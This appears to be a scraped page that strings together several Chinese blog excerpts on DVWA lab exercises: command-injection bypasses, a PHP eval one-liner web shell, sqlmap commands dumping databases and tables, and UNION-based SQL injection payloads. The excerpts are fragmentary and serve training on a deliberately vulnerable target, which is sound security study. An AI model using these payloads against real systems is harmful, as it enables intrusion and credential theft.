dvwa

【靶场训练_DVWA】Command Execution

匿名 (未验证) 提交于 2019-12-03 00:04:02
low 利用: ; ls ../../ 源码分析: <? php if ( isset ( $_POST [ 'submit' ] ) ) { //将ip对应的值复制给target $target = $_REQUEST [ 'ip' ]; if ( stristr ( php_uname ( 's' ), 'Windows NT' )) { //如果是winds就直接ping $cmd = shell_exec ( 'ping ' . $target ); echo '<pre>' . $cmd . '</pre>' ; } else { //如果是Linux就默认ping 3个包 $cmd = shell_exec ( 'ping -c 3 ' . $target ); echo '<pre>' . $cmd . '</pre>' ; } } ?> $_REQUEST[]具用$_POST[] $_GET[]的功能,但是$_REQUEST[]比较慢。通过post和get方法提交的所有数据都可以通过$_REQUEST数组获得 php_uname ― 返回运行 PHP 的系统的有关信息 stristr() 函数搜索字符串在另一字符串中的第一次出现 php_uname('s'):返回操作系统名称 Medium 利用: || 或者 &;& 或者 & 源码分析: 就多了一点过滤

DVWA之命令执行

匿名 (未验证) 提交于 2019-12-02 23:56:01
一、命令执行漏洞 命令执行漏洞是指可以随意执行系统命令,属于高危漏洞之一,也属与代码执行范围内,好比说一句话木马<?php@eval($_POST['cmd']);?> 二、分类: 1.代买过滤不严或无过滤 2.系统漏洞造成的命令执行, bash破壳漏洞,该漏洞可以构造环境变量的值来执行具有攻击力的脚本代码,会应县到bash交互的多种应用,例如http,ssh,dhcp && & | 三、演示 否则不能继续执行 即使第一个command1没有执行成功,也会执行command2 | 2、medium 设置DWVA Security等级 可选择绕过; 第一种绕过:127.0.0.1 &&& dir 3 、high 存在过滤漏洞 “| ” 来源:博客园 作者: Seizer 链接:https://www.cnblogs.com/bryen/p/11437735.html

DVWA的搭建

匿名 (未验证) 提交于 2019-12-02 23:56:01
DVWA的搭建 一、DVWA是什么? 一款渗透测试演练系统,俗称靶机。 二、如何搭建? Linux有成套的靶机,直接打开使用就可以,下面开始介绍Windows 下DVWA的搭建。 运行phpstudy 设置网站根目录 来源:博客园 作者: Seizer 链接:https://www.cnblogs.com/bryen/p/11437723.html

网络安全:sql注入基础――盲注

匿名 (未验证) 提交于 2019-12-02 23:56:01
上篇文章介绍了sql注入的简单原理。 通过发送一些符合语法的输入,执行特定的sql语句,将查询结果返回到页面。这种查询结果在页面显示的方式,我们称为“回显”。 举个实际的例子,如一登录窗口,输入用户名和密码,成功登录后。一般会在页面上显示“欢迎你,XXX”之类的话语,这个XXX就是你的用户名。而这个XXX也将作为我们注入回显的通道,通过XXX一点点抠出来我们上一篇中说道的数据。 还有一种情况,就是没有回显!你登录成功了,不会显示和查询相关的数据。比如,输入用户名密码,登录成功。界面只有一句“登录成功!”,别无它话。换而言之,我们查询的结果不会在页面上显示一丝一毫,咋办? 这种没有回显的注入,我们就称为盲注。也就是看不到查询结果的注入。 盲注的精髓就是一个字――猜! 虽然sql的查询结果不会显示,但是我们可以判断sql语句是否执行了。例,一个表中只有一个字段id,sql语句为select admin from table;,因为表中没有admin这个字段,sql语句执行错误,向页面返回错误。我们就可以根据页面是否报错,来判断我们输入的sql是否正确,如果页面没有报错,正常返回了。那我们就已经猜出来了这个表里有一个字段名字叫做admin。 如果按照上面那个登陆的例子,我们可以通过页面显示的登录成功或失败来判断输入的sql是否正确。 仍旧以DVWA作为讲解实例: 输入1: 输入10:

DVWA 之high级别sql注入

匿名 (未验证) 提交于 2019-12-02 23:48:02
高级注入, 抓包,然后保存数据到1.txt 1. 判断注入点 sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 #level是注入的等级,默认是1 2. 爆数据库 sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 --dbs 3. 爆表 sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 --tables -D "dvwa" 4. 爆字段 sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 --columns -D "dvwa" -T "users" 5.爆 帐号密码 sqlmap -r /root/1.txt -p id --second-order "http://192

DVWA平台sql注入

房东的猫 提交于 2019-12-02 23:39:33
Medium: Medium级别的代码利用mysql_real_escape_string函数对特殊符号\x00,\n,\r,\,’,”,\x1a进行转义,同时前端使用了下拉选择菜单,可以通过抓包改参数,提交恶意构造的查询参数。 1.判断注入是字符型还是数字型 抓包更改参数id为1’ or 1=1 # 报错: 抓包更改参数id为1 or 1=1 #,查询成功: 说明存在数字型注入。 2.猜解SQL查询语句中的字段数 抓包更改参数id为1 order by 2 #,查询成功: 抓包更改参数id为1 order by 3 #,报错 说明执行的SQL查询语句中只有两个字段 3.确定显示的字段顺序 抓包更改参数id为1 union select 1,2 #,查询成功, 说明执行的SQL语句为select First name,Surname from 表 where ID=id… 4.获取当前数据库 抓包更改参数id为1 union select 1,database() # 说明当前的数据库为dvwa。 5.获取数据库中的表 抓包更改参数id为1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() # 说明数据库dvwa中一共有两个表

Web漏洞扫描(二:Windows server2008 R2操作系统(部署dvwa))

匿名 (未验证) 提交于 2019-12-02 23:35:02
版权声明:本资料为博主学习整理,如有雷同,请联系博主yanxukun625@aliyun.com https://blog.csdn.net/qq_37823605/article/details/90476225 在Windows server 2008 R2系统中部署dvwa; 1、在Windows server 2008虚拟机中配置IIS; 1.1、打开服务器管理器,角色,添加角色,然后点击下一步; 1.2、选择安装“Web 服务器(IIS)”,点击下一步; 1.3、选择角色服务; 1.4、点击安装; 1.5完成安装进行测试; 2、搭建dvwa测试网站; 2.1、下载DWVA的压缩包,放在phpStudy安装目录下的WWW中,并解压;下载地址为: https://github.com/ethicalhack3r/DVWA ; 2.2、配置DVWA连接数据库,打开config文件夹,打开config.inc.php,把db_password修改成root,(因为安装好的基层默认的MYSQL连接用户名和用户密码为root root,也可以启动phpStudy 2016后点击“MySQL管理器”->“MYSQL Front”->选择连接->“属性”修改连接信息); 2.3、在浏览器输入http://127.0.0.1/dvwa, 然后点击页面底部的“Create/Rest

DVWA-----------sql注入

匿名 (未验证) 提交于 2019-12-02 23:34:01
说明 sql注入原理:将恶意的SQL语句拼接到合法的语句中,从而达到执行SQL语句的目的 sql注入类型 整数型 字符型 搜索型 一、low级别 1、先确定正常和不正常的回显。 输入1时,回显是这一种,正常的。 输入10时,回显没有回显,不正常的。 2、判断注入 输入1 and 1=1 输入1 and 1=2 两种都执行的是1,回显出了正常的数据,所以说后面的都被过滤掉了,接下来尝试过滤的方式。用引号闭合一下。 输入:1’ and ‘1’=‘1 回显正常 输入:1’ and ‘1’=‘2 回显错误。 所以说明存在注入点,使用了引号闭合。 3、列字段 1’ order by 3# 回显错误,说明字段数小于3 1’ order by 2# 回显正常,说明字段数等于2 4、判断数据库版本 1’ union select version(),2# 版本信息大于5.0,说明有数据库表,可以曝出数据. information_schema 5、获取数据库名称,用户。 1’ union select database(),user()# 6、爆出dvwa里面的所有表名 1’ union select table_name,2 from information_schema.tables where table_schema=‘dvwa’# 有两张表 7、爆出users表里面的的所有列名 1’

DVWA-暴力破解

匿名 (未验证) 提交于 2019-12-02 23:26:52
DVWA-暴力破解 1.暴力破解 2.burp安装证书 3.万能密码 一、暴力破解 burp四种暴力破解类型: Cluster bomb 两个字典,两个参数,交叉匹配,所有可能  一、实验环境: 客户端:win10 服务端:win2003搭建DVWA 二、实验步骤: 1.安装phpstudy软件,搭建web服务器 2.把dvwa放到网站根目录下 3.修改DVWA配置文件,修改数据库密码 4.在客户端浏览器访问靶机,初始化DVWA    5.修改DVWA的级别为low 查看源码,可以看到没有对username和password参数进行任何过滤,直接放入到数据库中进行查询(存在万能密码漏洞),也没有对账户登录失败做任何限制(存在暴力破解漏洞)    6.设置burp代理,拦截数据包    7.设置浏览器代理    8.在win10上访问 http://192.168.10.130/dvwa ,点击Brute Force,随便输入用户名和密码,可以看到burp拦截到数据包    9.把截取的数据包发给intruder,修改intruder的参数    10. 选择攻击类型,加载字典    开始攻击,下图可以看到成功跑出密码    下图可以看到,暴力破解为同用户同密码          11.修改DVWA的级别为medium 分析源码可以看到,对账户登录失败做了时间限制(sleep 2秒)

DVWA 攻击平台测试

匿名 (未验证) 提交于 2019-12-02 23:06:17
DVWA是OWASP官方提供的一个做渗透测试的平台 1.SQL injection 1.利用特殊字符验证绕过SQL 当我们输入1的时候 ID有一个回显 当我们接着输入''的时候,SQL回显报错 初步可以判断这里存在SQL注入点 绕过了验证 利用”order by 1。2。3.。。-- “猜测一下数据的列数 当输入1‘ order by 2-- 时和第一种情况是一样的,验证到3的时候 可以获得这个数据库中含有2列数据 3.通过得到连接数据库账户信息、数据库名称、数据库版本信息。利用user(),及database(),version()等三个内置函数。 可以查询到当前SQL版本是5.5.53 操作系统 信息 1'and 1=2 union select 1,@@global.version_compile_os from mysql.user -- 5.测试连接数据库权限: 1’ and ord(mid(user(),1,1))=114 -- 猜测数据库中是否存在root用户若返回正常说明是root 6.查询mysql数据库,所有数据库名字:这里利用mysql默认的数据库infromation_scehma,该数据库存储了Mysql所有数据库和表的信息。 这个数据库中所有成员的信息已经显示出来了。 以上是注入一个SQL数据库的所有步骤。总结一下: 1、寻找注入点